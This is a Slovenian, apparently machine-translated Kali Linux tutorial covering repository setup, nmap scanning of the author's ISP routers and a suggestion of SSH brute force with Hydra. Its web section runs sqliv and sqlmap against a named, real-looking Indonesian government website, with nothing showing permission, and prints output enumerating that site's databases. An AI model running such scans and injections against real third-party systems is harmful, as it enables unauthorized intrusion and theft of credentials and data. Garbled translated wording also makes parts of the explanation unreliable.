Vadnica za Kali Linux

Kali Linux Tutorial



Če ste strokovnjak ali vsaj seznanjeni z Linuxom, ukazi in okoljem, ste pravkar namestili Kali Linux na svoj računalnik, želite postati mojster Kali Linuxa ali etični heker, potem ste na pravem mestu. V tem članku bom obravnaval vadnico Kali Linux za uporabnike Linuxa, ki še ne poznajo Kali, in vas seznanil z nekaterimi osnovnimi tehnikami, ki se uporabljajo za hekanje in varnostno testiranje med uporabo Kali.

Kaj je Kali Linux?

Kali Linux, ( prvič objavljeno 13. marca 2013 ), ki je bil uradno znan kot BackTrack, ki ga je razvilo varnostno podjetje Offensive Security, je forenzična in varnostno usmerjena distribucija, ki temelji na podružnici Debian's Testing. Kali Linux je zasnovan z mislijo na testiranje penetracije, obnovitev podatkov in odkrivanje groženj. Projekt je v začetku tega leta prešel na tekoči model izdaje, da bi uporabnikom distribucije zagotovil novejše varnostne pripomočke. Kali Linux je brezplačen in vedno bo. Vključuje 600+ orodij za testiranje penetracije.







Zakaj Kali Linux? Je pravi za vas?

Kali Linux je v zadnjem času pridobil veliko popularnost. In za tem obstaja razlog. Hekiranje se je v popularni kulturi vrnilo kot kul stvar, kar je mogoče pripisati televizijski seriji Gospod Robot. Priljubljenost gospoda Robota je pomagala Kali Linuxu pri pridobivanju novih uporabnikov. Ljudje, ki skoraj ne poznajo Linuxa ali česar koli, kar je povezano z računalniško varnostjo, zdaj poskušajo uporabiti Kali kot svojo glavno distribucijo Linuxa.



Naša najnaprednejša distribucija testiranja penetracije, doslej. - Razvijalci Kali Linux. (Napisano je na glavni strani Kali.org na samem vrhu strani.) Kaj imate od te izjave? Ali opazite to: APTD (Advanced Penetration Testing Distribution)? Tu dobesedno ni izraza hekanje. Kali Linux je enak kot druge distribucije Linuxa. Preprosto povedano, to je distribucija Linuxa, opremljena z varnostnimi orodji in namenjena strokovnjakom za omrežno in računalniško varnost. Vendar se uporaba Kali Linuxa osredotoča le na varnost in forenziko.



Distribucija Linuxa ni nič drugega kot sveženj, ki vsebuje jedro Linuxa, nabor osnovnih pripomočkov in aplikacij ter nekaj privzetih nastavitev. Torej, Kali Linux ne ponuja ničesar edinstvenega v tem smislu bi lahko večina ponujenih orodij namestili na katero koli distribucijo Linuxa.





Kali Linux je posebej prilagojen zahtevam strokovnega testiranja penetracije in varnostne revizije. Namenjen je določeni podskupini uporabnikov Linuxa. Pentesters, hekerji itd. Ni priporočljiva distribucija, če pričakujete, da bo Kali za namizje za splošno uporabo Linuxa za razvoj, spletno oblikovanje, igre na srečo, pisarno itd. Kali vam lahko predstavlja nekaj izzivov, tudi če ste izkušen uporabnik Linuxa .

STVARI PO NAMESTITVI KALI LINUX

Po namestitvi Kali Linux se boste morda vprašali, kaj storiti s tem, kajne? S to težavo se soočajo vsi, ne skrbite.



1. KORAK: NASTAVITE REPOZITOR

Prvič, to morda že veste, vendar je ključnega pomena, da shrambo pravilno nastavite. Kot sem rekel, si prizadeva model tekoče izdaje Kali Linux zagotoviti uporabnikom distribucije novejše varnostne pripomočke. Na splošno, če imate Kali Linux sveže nameščen, se skladišče sklicuje na medije, ki jih uporabljate za namestitev. Če želite to odpraviti, morate spremeniti skladišče v uradno skladišče Kali Linux. Zahtevana datoteka se nahaja pod /etc/apt/sources.list . Odprite datoteko z urejevalnikom besedila na plošči in zamenjajte privzeto skladišče v to uradno skladišče Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

2. KORAK: Posodobite in nadgradite KALI LINUX

Po tej posodobitvi in ​​nadgradnji sistema sinhronizirajte svoj Kali Linux z najnovejšo različico. Če želite to narediti, odprite terminal in vnesite:

apt update -y && apt upgrade -y && apt dist-upgrade 

Ukaz apt update naloži in pridobi paket s podatki iz skladišč in jih posodobi, da dobi informacije o najnovejših različicah paketov in njihovih odvisnostih.

Ukaz apt upgrade prenese in namesti novejšo različico paketov nameščenih paketov Kali Linux, če nima napak pri odvisnostih.

Nadgradnja apt dist bo vse pakete posodobila na najnovejšo razpoložljivo različico. Prav tako po potrebi namestite in odstranite odvisnosti (očitno namestite odvisnosti za zadovoljitev paketov, pa tudi odstranite odvisnosti, ki so osirotele, če posodobljeni paket ni več potreboval odvisnosti.

OSNOVNI KONCEPT TESTIRANJA PENETRACIJE S KALI LINUX

Ko ste uspešno izvedli te korake, lahko s Kali Linuxom na podlagi ciljnega sistema naredite tri glavne stvari, med drugim:

  1. Vdor v brezžično omrežje - Wifi vdiranje, Phishing, ARP zastrupitev itd.
  2. Vdor v spletne aplikacije -Injekcija SQL, ponarejanje zahtev na več mestih (CSRF), spletno phishing itd.
  3. Vdor v napravo - Izkoristite ciljni stroj za nadzor nad njim.

Ne vštevam vdora v IoT, to ne pomeni, da Kali Linux nima sposobnosti za ta namen. Toda dobesedno lahko pripada tudi hekanju naprav. Ker ima naprava fizični videz in obliko. V tej vadnici sem obravnaval osnovno znanje o njih. Ker je Kali Linux ogromen, ne sodi v en članek!

Prav tako morate poznati cikel ali postopek preskušanja penetracije. So:

  1. Izvidništvo - zbiranje informacij
  2. Skeniranje
  3. Operacija
  4. Po izkoriščanju

BREZŽIČNO MREŽNO TAKOVANJE S KALI LINUX

Kar zadeva vdor v brezžično omrežje, se lahko žrtev razlikuje. Ker so brezžična omrežja sestavljena iz več stvari, kot so ISP (ponudnik internetnih storitev), usmerjevalnik in njegovi sorodniki (modem, zvezdišče, stikalo itd.) In odjemalci (uporabniki, CCTV, oddaljeni računalnik itd.). Imajo tudi ranljive možnosti.

Internet je velika in zapletena zbirka omrežne strojne opreme, ki jo povezujejo prehodi. Sledenje poti, po kateri sledijo vaši paketi, je pomembno, če želite vedeti, kako dosežete določeno ime gostitelja ali ciljni naslov IP.

Kali Linux ima vgrajeno orodje, imenovano Traceroute. Traceroute uporablja čas protokola IP za živo polje in poskuša iz vsakega prehoda vzdolž poti do nekega gostitelja izzvati odziv ICMP TIME_EXCEEDED. Traceroute poskuša slediti poti, po kateri bi paket IP sledil nekaterim internetnim gostiteljem, tako da bi sprožil pakete sond z majhnim TTL (čas za življenje), nato pa poslušal, koliko časa ICMP preseže odgovor na prehodu. Dal vam bom in primer, kako slediti usmerjevalniku ponudnikov internetnih storitev, ki se uporablja za upravljanje naše povezave s pomočjo Traceroute.

1. Priznanje

Zbiranje informacij je najpomembnejši začetek, ne zamudite tega koraka. V tem koraku je naš namen pridobiti čim več koristnih informacij, ki bi jih lahko dobili, nato pa se ti podatki uporabijo za nadaljnje korake.

Najprej odprite terminal in vnesite ta ukaz, da začnete slediti poti do spletnega mesta, v tem primeru sem spletno mesto nastavil na google.com.

traceroute google.com 

Posnetek zaslona Traceroute

2. Optično branje

Ko zaženemo ukaze, bo na seznamu, kamor gre naš paket v zaporedju. Kot lahko vidite zgoraj, imam 3 hmelja, od katerih je eden moj strežnik ponudnika internetnih storitev. Prvi IP na seznamu je moj usmerjevalnik, ki deluje kot prehod. Naslednja dva pripadata mojemu ponudniku internetnih storitev. Zdaj pa preverimo, katero storitev izvajajo z uporabo Nmap. Torej, cilji, ki jih bomo pregledali, so 10.152.192.1 in 10.13.223.102 . V terminalu sem izvedel naslednji ukaz:

nmap -v -sS [IP Target] -Pn 

Razčlenimo argument ukaza:

-v = Omogoči način podrobnosti

-sS = Uporabite tehniko skeniranja TCP SYN

-Pn = Z vsemi gostitelji ravnajte kot na spletu -preskočite odkrivanje gostitelja

In tukaj je rezultat, ki smo ga dobili.

posnetek zaslona nmap 2

Na žalost so vsa vrata vklopljena 10.152.192.1 so filtrirane, kar pomeni, da IDS ali požarni zid na tem IP blokirajo vse dohodne povezave TCP. Zdaj pa ponovimo skeniranje na drugo tarčo.

Posnetek zaslona nmap 1

3. Delovanje

V tem postopku nisem namenjen dejanskemu izkoriščanju, namesto tega vam pokažem, kako. Na podlagi zgornjih rezultatov skeniranja Nmap vemo, da ima ta IP strežnik, ki deluje na vratih 22, in je odprt. Odprto je, da se zlorablja, haha! Našli smo luknjo, ta strežnik SSH je možna luknja, do katere bi lahko poskusili priti. V Kali Linuxu obstaja več orodij, ki podpirajo bruteforce ali slovarske napade na protokol SSH. Najbolj priljubljena in močna je Hydra.

V redu, to je bil osnovni postopek, ki je izvedel test penetracije proti ciljnemu strežniku, kar je v našem primeru tukaj moj strežnik ponudnika internetnih storitev.

Spletne aplikacije, ki vdrejo s programom KALI LINUX

Pravzaprav, če ste pri tem strastni, lahko nastavite svoje hekersko okolje tako, da v svoj Kali Linux namestite DWVA (Prekleto ranljiva spletna aplikacija). To je spletna aplikacija PHP/MySQL, ki ima kup ranljivih lukenj. Njeni glavni cilji so pomagati varnostnim strokovnjakom, da preizkusijo svoje sposobnosti in orodja v pravnem okolju, ter spletnim razvijalcem pomagati bolje razumeti procese varovanja spletnih aplikacij. DWVA lahko brezplačno dobite na Githubu tukaj: https://github.com/ethicalhack3r/DVWA.

Zaenkrat vam bom pokazal, kako lahko na spletnih mestih vdrete v spletne aplikacije. Toda obljubite mi, da je omejen samo na izobraževalne namene. S pomočjo injekcije SQL bomo simulirali pravi napad na resnično spletno mesto.

Predpogoj

Zajeta orodja:

-Whatweb (vnaprej nameščen)

-Nmap (vnaprej nameščen)

- SQLiv (namestite ročno)

-SQLMap (vnaprej nameščen)

Potrebujemo še eno dodatno orodje, ki je na voljo na Githubu tukaj: https://github.com/Hadesy2k/sqliv, najprej ga namestite v naš Kali Linux. To orodje z imenom SQLiv, ki lahko izvaja ciljno iskanje z zagotavljanjem določene domene (s pajkanjem). Vnesite terminal:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Cilj: www.trenggalekkab.go.id

1. Priznanje

Zberemo čim več koristnih informacij. Lahko bi odprli spletno stran in zaznali, katera aplikacija se izvaja na tem mestu. Najprej preverimo, za kakšno spletno stran gre. Za to bomo uporabili whatweb.

whatweb www.trenggalekkab.go.id 

Kakšen spletni posnetek zaslona

Kot lahko vidite zgoraj, se cilj nahaja v Indoneziji. Teče Apache v2.2.27 na svojem spletnem strežniku in ima tudi PHP v5.4.31 , ima naslov IP 103.247.21.142 . V redu, upoštevaj to. Morda boste morali obiskati njeno spletno stran in poiskati izdelano datoteko ali stran, parametre URL -ja ali celo obrazec za prijavo. Za zdaj potrebujemo ta naslov IP za naslednji korak, ki je skeniranje.

2. Optično branje

Kot doslej znova uporabljamo Nmap za skeniranje, katera vrata in storitve delujejo na cilju.

nmap -v -sS 103.247.21.142 

In tukaj je rezultat, ki smo ga dobili:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Obstaja veliko odprtih vrat, ki obravnavajo vsako storitev na tarči, toda tisto, kar pritegne pozornost, je storitev mysql na vratih 3306. Navedeno je, da to spletno mesto uporablja mysql za upravljanje svojih podatkov v zbirkah podatkov. Potem se sprašujem, ali je na tem spletnem mestu kakšna ranljivost za Injection SQL. Torej, znova pregledam spletno mesto z uporabo SQLiv, ki smo ga pravkar namestili. Vtipkal sem ukaz:

sqliv -t www.trenggalekkab.go.id 

Posnetek zaslona SQLHacking1

Na tem spletnem mestu smo našli 2 možna URL -ja, občutljiva na SQL. Zapomnite si te URL -je.

3. Delovanje

V redu, imamo ranljive URL -je SQL in pripravljene za izvajanje. Za to bomo uporabili SQLMap. Sintaksa je:

sqlmap [Vulnerable URL] --dbs 

Ukaz bi moral izgledati tako:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argument –dbs je, da pove SQLMap, da pridobi ciljne baze podatkov. Tukaj je rezultat, ki ga imamo:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap je našel 2 bazi podatkov, vendar le eno med njimi, ki vsebuje občutljive podatke, na primer račun poverilnic skrbnika. To je na trengkab_trg. Ko smo našli baze podatkov, moramo narediti še en korak. To je iskanje tabel in stolpcev, zadnji korak pa je izpis podatkov. V tem razdelku s pomočjo tega cilja vam ne bom pokazal, kako. Vsaj poznate osnovno idejo o ciklu napada in uporabljate nekaj orodij.

VSEBINA NAPRAV

V prihodnjem članku na tem spletnem mestu bomo obravnavali vdore v naprave, spremljajte nas. Kot predhodno opozorilo se boste prepričali, da poznate nekaj Pythona za to.